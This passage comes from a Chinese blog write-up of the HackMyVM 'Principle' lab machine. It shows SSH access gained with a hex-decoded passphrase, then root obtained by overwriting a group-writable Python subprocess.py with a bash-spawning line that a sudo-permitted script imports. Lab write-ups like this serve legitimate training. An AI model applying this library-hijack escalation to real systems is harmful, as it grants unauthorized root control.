-rw-r----- <span class="token number">1</span> elohim elohim  <span class="token number">261</span> Jul  <span class="token number">5</span>  <span class="token number">2023</span> .bash_logout
-rw-r----- <span class="token number">1</span> elohim elohim <span class="token number">3830</span> Jul <span class="token number">14</span>  <span class="token number">2023</span> .bashrc
-rw-r----- <span class="token number">1</span> elohim elohim  <span class="token number">777</span> Jul <span class="token number">13</span>  <span class="token number">2023</span> flag.txt
drw-r----- <span class="token number">3</span> elohim elohim <span class="token number">4096</span> Jul  <span class="token number">2</span>  <span class="token number">2023</span> .local
-rw-r----- <span class="token number">1</span> elohim elohim   <span class="token number">21</span> Jul <span class="token number">12</span>  <span class="token number">2023</span> .lock
-rw-r----- <span class="token number">1</span> elohim elohim  <span class="token number">807</span> Jul  <span class="token number">6</span>  <span class="token number">2023</span> .profile
drwx------ <span class="token number">2</span> elohim elohim <span class="token number">4096</span> Jul  <span class="token number">6</span>  <span class="token number">2023</span> .ssh</code></pre>
<p>注意到gehenna下面还有一个.lock的文件夹 看看里面有什么</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">talos@principle:~$ <span class="token function">touch</span> .lock 
talos@principle:~$ <span class="token function">chmod</span> <span class="token number">666</span> .lock
talos@principle:~$ <span class="token function">sudo</span> <span class="token parameter variable">-u</span> elohim <span class="token function">cp</span> /home/gehenna/.lock <span class="token builtin class-name">.</span>
talos@principle:~$ <span class="token function">cat</span> .lock
7072696e6369706c6573</code></pre>
<p>转一下字符串<br><a target="_blank" rel="noopener" href="https://img.tg/image/OpnPGK"><img src="https://ooo.0x0.ooo/2024/04/21/OpnPGK.png" alt="OpnPGK.png" loading="lazy"></a><br>因该是ssh连接的lock<code>principles</code></p>
<pre class="language-bash" data-language="bash"><code class="language-bash">talos@principle:~$ ./ssh <span class="token parameter variable">-i</span> id_rsa <span class="token parameter variable">-p</span> <span class="token number">3445</span> elohim@localhost
Enter passphrase <span class="token keyword">for</span> key <span class="token string">'id_rsa'</span><span class="token builtin class-name">:</span> 


Son, you didn<span class="token string">'t listen to me, and now you'</span>re trapped.
You've come a long way, but this is the end of your journey.

elohim@principle:~$ <span class="token function">id</span>
<span class="token assign-left variable">uid</span><span class="token operator">=</span><span class="token number">1001</span><span class="token punctuation">(</span>elohim<span class="token punctuation">)</span> <span class="token assign-left variable">gid</span><span class="token operator">=</span><span class="token number">1001</span><span class="token punctuation">(</span>elohim<span class="token punctuation">)</span> <span class="token assign-left variable">groups</span><span class="token operator">=</span><span class="token number">1001</span><span class="token punctuation">(</span>elohim<span class="token punctuation">)</span>,1002<span class="token punctuation">(</span>sml<span class="token punctuation">)</span></code></pre>
<p>成功拿到elohim的权限</p>
<h2 id="提权root"><a href="#提权root" class="headerlink" title="提权root"></a>提权root</h2><pre class="language-bash" data-language="bash"><code class="language-bash">elohim@principle:~$ <span class="token function">sudo</span> <span class="token parameter variable">-l</span>
Matching Defaults entries <span class="token keyword">for</span> elohim on principle:
    env_reset, mail_badpass,
    <span class="token assign-left variable">secure_path</span><span class="token operator">=</span>/usr/local/sbin<span class="token punctuation">\</span>:/usr/local/bin<span class="token punctuation">\</span>:/usr/sbin<span class="token punctuation">\</span>:/usr/bin<span class="token punctuation">\</span>:/sbin<span class="token punctuation">\</span>:/bin,
    use_pty

User elohim may run the following commands on principle:
    <span class="token punctuation">(</span>root<span class="token punctuation">)</span> NOPASSWD: /usr/bin/python3 /opt/reviewer.py
elohim@principle:~$ <span class="token function">cat</span> /opt/re*
rbash: cat:: No such <span class="token function">file</span> or directory</code></pre>
<p>看一下这个py文件</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">elohim@principle:~$ <span class="token function">nl</span> /opt/re*
     <span class="token number">1</span>  <span class="token comment">#!/usr/bin/python3</span>
       
     <span class="token number">2</span>  <span class="token function">import</span> os
     <span class="token number">3</span>  <span class="token function">import</span> subprocess
       
     <span class="token number">4</span>  def eliminar_archivos_incorrectos<span class="token punctuation">(</span>directorio<span class="token punctuation">)</span>:
     <span class="token number">5</span>      extensiones_validas <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token string">'.jpg'</span>, <span class="token string">'.png'</span>, <span class="token string">'.gif'</span><span class="token punctuation">]</span>
     <span class="token number">6</span>      
     <span class="token number">7</span>      <span class="token keyword">for</span> <span class="token for-or-select variable">nombre_archivo</span> <span class="token keyword">in</span> os.listdir<span class="token punctuation">(</span>directorio<span class="token punctuation">)</span>:
     <span class="token number">8</span>          archivo <span class="token operator">=</span> os.path.join<span class="token punctuation">(</span>directorio, nombre_archivo<span class="token punctuation">)</span>
     <span class="token number">9</span>          
    <span class="token number">10</span>          <span class="token keyword">if</span> os.path.isfile<span class="token punctuation">(</span>archivo<span class="token punctuation">)</span>:
    <span class="token number">11</span>              _, extension <span class="token operator">=</span> os.path.splitext<span class="token punctuation">(</span>archivo<span class="token punctuation">)</span>
    <span class="token number">12</span>              
    <span class="token number">13</span>              <span class="token keyword">if</span> extension.lower<span class="token punctuation">(</span><span class="token punctuation">)</span> not <span class="token keyword">in</span> extensiones_validas:
    <span class="token number">14</span>                  os.remove<span class="token punctuation">(</span>archivo<span class="token punctuation">)</span>
    <span class="token number">15</span>                  print<span class="token punctuation">(</span>f<span class="token string">"Archivo eliminado: &#123;archivo&#125;"</span><span class="token punctuation">)</span>
       
    <span class="token number">16</span>  directorio <span class="token operator">=</span> <span class="token string">'/var/www/hellfire.t4l0s.hmv/archivos'</span>
       
    <span class="token number">17</span>  eliminar_archivos_incorrectos<span class="token punctuation">(</span>directorio<span class="token punctuation">)</span>
       
    <span class="token number">18</span>  def enviar_mensaje_usuarios_conectados<span class="token punctuation">(</span><span class="token punctuation">)</span>:
    <span class="token number">19</span>      proceso <span class="token operator">=</span> subprocess.Popen<span class="token punctuation">(</span><span class="token punctuation">[</span><span class="token string">'who'</span><span class="token punctuation">]</span>, <span class="token assign-left variable">stdout</span><span class="token operator">=</span>subprocess.PIPE<span class="token punctuation">)</span>
    <span class="token number">20</span>      salida, _ <span class="token operator">=</span> proceso.communicate<span class="token punctuation">(</span><span class="token punctuation">)</span>
    <span class="token number">21</span>      lista_usuarios <span class="token operator">=</span> salida.decode<span class="token punctuation">(</span><span class="token punctuation">)</span>.strip<span class="token punctuation">(</span><span class="token punctuation">)</span>.split<span class="token punctuation">(</span><span class="token string">'\n'</span><span class="token punctuation">)</span>
    <span class="token number">22</span>      usuarios_conectados <span class="token operator">=</span> <span class="token punctuation">[</span>usuario.split<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span> <span class="token keyword">for</span> <span class="token for-or-select variable">usuario</span> <span class="token keyword">in</span> lista_usuarios<span class="token punctuation">]</span>
    <span class="token number">23</span>      mensaje <span class="token operator">=</span> f<span class="token string">"I have detected an intruder, stealing accounts: &#123;', '.join(usuarios_conectados)&#125;"</span>
    <span class="token number">24</span>      subprocess.run<span class="token punctuation">(</span><span class="token punctuation">[</span><span class="token string">'wall'</span>, mensaje<span class="token punctuation">]</span><span class="token punctuation">)</span>
       
    <span class="token number">25</span>  enviar_mensaje_usuarios_conectados<span class="token punctuation">(</span><span class="token punctuation">)</span></code></pre>
<p>脚本上没有提权的手段，只能从库文件下手</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">elohim@principle:~$ <span class="token function">find</span> / <span class="token parameter variable">-name</span> subprocess.py <span class="token operator"><span class="token file-descriptor important">2</span>></span>/dev/null <span class="token parameter variable">-ls</span>
    <span class="token number">19941</span>     <span class="token number">84</span> -rw-rw-r--   <span class="token number">1</span> root     sml         <span class="token number">85745</span> Jul <span class="token number">11</span>  <span class="token number">2023</span> /usr/lib/python3.11/subprocess.py
    <span class="token number">20391</span>      <span class="token number">8</span> -rw-r--r--   <span class="token number">1</span> root     root         <span class="token number">7405</span> Mar <span class="token number">13</span>  <span class="token number">2023</span> /usr/lib/python3.11/asyncio/subprocess.py
elohim@principle:~$ <span class="token function">id</span>
<span class="token assign-left variable">uid</span><span class="token operator">=</span><span class="token number">1001</span><span class="token punctuation">(</span>elohim<span class="token punctuation">)</span> <span class="token assign-left variable">gid</span><span class="token operator">=</span><span class="token number">1001</span><span class="token punctuation">(</span>elohim<span class="token punctuation">)</span> <span class="token assign-left variable">groups</span><span class="token operator">=</span><span class="token number">1001</span><span class="token punctuation">(</span>elohim<span class="token punctuation">)</span>,1002<span class="token punctuation">(</span>sml<span class="token punctuation">)</span></code></pre>
<p>正好所属组是 sml，直接修改这个库</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">elohim@principle:~$ <span class="token builtin class-name">echo</span> <span class="token string">'os.system("/bin/bash")'</span> <span class="token operator">></span> /usr/lib/python3.11/subprocess.py
elohim@principle:~$ <span class="token function">sudo</span> /usr/bin/python3 /opt/reviewer.py
root@principle:/home/gehenna<span class="token comment"># id</span>
<span class="token assign-left variable">uid</span><span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">(</span>root<span class="token punctuation">)</span> <span class="token assign-left variable">gid</span><span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">(</span>root<span class="token punctuation">)</span> <span class="token assign-left variable">groups</span><span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">(</span>root<span class="token punctuation">)</span>
root@principle:/home/gehenna<span class="token comment"># cat /root/r*</span>
CONGRATULATIONS, the system has been pwned<span class="token operator">!</span>

          _______
        @@@@@@@@@@@
      @@@@@@@@@@@@@@@
     @@@@@@@222@@@@@@@
    <span class="token punctuation">(</span>@@@@@/_____<span class="token punctuation">\</span>@@@@@<span class="token punctuation">)</span>
     @@@@<span class="token punctuation">(</span>_______<span class="token punctuation">)</span>@@@@
      @@@<span class="token punctuation">&#123;</span> <span class="token string">" L "</span> <span class="token punctuation">&#125;</span>@@@
       <span class="token punctuation">\</span>@  <span class="token punctuation">\</span> - /  @/
        /    ~    <span class="token punctuation">\</span>
      / <span class="token operator">==</span>        <span class="token operator">==</span> <span class="token punctuation">\</span>
    <span class="token operator">&lt;</span>      <span class="token punctuation">\</span> __ /      <span class="token operator">></span>
   / <span class="token punctuation">\</span>          <span class="token operator">|</span>    /  <span class="token punctuation">\</span>
 /    <span class="token punctuation">\</span>       <span class="token operator">==</span><span class="token operator">+=</span><span class="token operator">=</span>       <span class="token punctuation">\</span>
<span class="token operator">|</span>      <span class="token punctuation">\</span>     ___<span class="token operator">|</span>_         <span class="token operator">|</span>
<span class="token operator">|</span> <span class="token punctuation">\</span>//~~~<span class="token operator">|</span>---/ * ~~~~  <span class="token operator">|</span>     <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#123;</span>  /<span class="token operator">|</span>   <span class="token operator">|</span>-----/~~~~<span class="token operator">|</span>  <span class="token operator">|</span>    /
 <span class="token punctuation">\</span>_ <span class="token operator">|</span>  /           <span class="token operator">|</span>__<span class="token operator">|</span>_ /


****************</code></pre>
<p>终于拿到root了，靶机不是太难，但是好费事.</p>
</div></section><ul class="post-copyright"><li class="post-copyright-author"><strong>本文作者：</strong>ta0</li><li class="post-copyright-link"><strong>本文链接：</strong><a href="https://tao0845.github.io/posts/85f65919/" title="HackMyVM-Principle">https://tao0845.github.io/posts/85f65919/</a></li><li class="post-copyright-license"><strong>版权声明：</strong>本博客所有文章除特别声明外，均默认采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 "><span class="icon iconify" data-icon="ri:creative-commons-line"></span><span class="icon iconify" data-icon="ri:creative-commons-by-line"></span><span class="icon iconify" data-icon="ri:creative-commons-nc-line"></span><span class="icon iconify" data-icon="ri:creative-commons-sa-line"></span></a> 许可协议。</li></ul></article><div class="post-nav"><div class="post-nav-item"><a class="post-nav-prev" href="/posts/f79382a3/" rel="prev" title="第一届&quot;帕鲁杯&quot;wp"><span class="icon iconify" data-icon="ri:arrow-left-s-line"></span><span class="post-nav-text">第一届&quot;帕鲁杯&quot;wp</span></a></div><div class="post-nav-item"><a class="post-nav-next" href="/posts/3ca28c17/" rel="next" title="HackMyVM-Tiny"><span class="post-nav-text">HackMyVM-Tiny</span><span class="icon iconify" data-icon="ri:arrow-right-s-line"></span></a></div></div></div><div class="hty-card" id="comment"></div></main><footer class="sidebar-translate" id="footer"><div class="copyright"><span>&copy; 2019 – 2025 </span><span class="with-love" id="animate"><span class="icon iconify" data-icon="ri:cloud-line"></span></span><span class="author"> ta0</span></div><div class="powered"><span>由 <a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a> 驱动 v7.1.1</span><span class="footer-separator">|</span><span>主题 - <a rel="noopener" href="https://github.com/YunYouJun/hexo-theme-yun" target="_blank"><span>Yun</span></a> v1.10.11</span></div><div id="busuanzi"><span id="busuanzi_container_site_uv" title="总访客量"><span><span class="icon iconify" data-icon="ri:user-line"></span></span><span id="busuanzi_value_site_uv"></span></span><span class="footer-separator">|</span><span id="busuanzi_container_site_pv" title="总访问量"><span><span class="icon iconify" data-icon="ri:eye-line"></span></span><span id="busuanzi_value_site_pv"></span></span><script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></footer></div><a class="hty-icon-button" id="back-to-top" aria-label="back-to-top" href="#"><span class="icon iconify" data-icon="ri:arrow-up-s-line"></span><svg class="progress-circle-container" viewBox="0 0 100 100"><circle class="progress-circle" id="progressCircle" cx="50" cy="50" r="48" fill="none" stroke="#0078E7" stroke-width="2" stroke-linecap="round"></circle></svg></a><a class="popup-trigger hty-icon-button icon-search" id="search" href="javascript:;" title="搜索"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:search-line"></span></span></a><script>window.addEventListener("DOMContentLoaded", () => {
  // Handle and trigger popup window
  document.querySelector(".popup-trigger").addEventListener("click", () => {
    document.querySelector(".popup").classList.add("show");
    setTimeout(() => {
      document.querySelector(".search-input").focus();
    }, 100);
  });

  // Monitor main search box
  const onPopupClose = () => {
    document.querySelector(".popup").classList.remove("show");
  };

  document.querySelector(".popup-btn-close").addEventListener("click", () => {
    onPopupClose();
  });

  window.addEventListener("keyup", event => {
    if (event.key === "Escape") {
      onPopupClose();
    }
  });
});
</script><script src="https://fastly.jsdelivr.net/npm/hexo-generator-searchdb@1.4.0/dist/search.js"></script><script src="/js/search/local-search.js" defer type="module"></script><div class="popup search-popup"><div class="search-header"><span class="popup-btn-close close-icon hty-icon-button"><span class="icon iconify" data-icon="ri:close-line"></span></span></div><div class="search-input-container"><input class="search-input" id="local-search-input" type="text" placeholder="搜索..." value=""></div><div class="search-result-container"></div></div><script src="https://fastly.jsdelivr.net/npm/medium-zoom@1.0.6/dist/medium-zoom.min.js"></script><script>const images = [...document.querySelectorAll('.markdown-body img')]
mediumZoom(images)</script><style>.medium-zoom-image {
  z-index: 99;
}</style></body></html>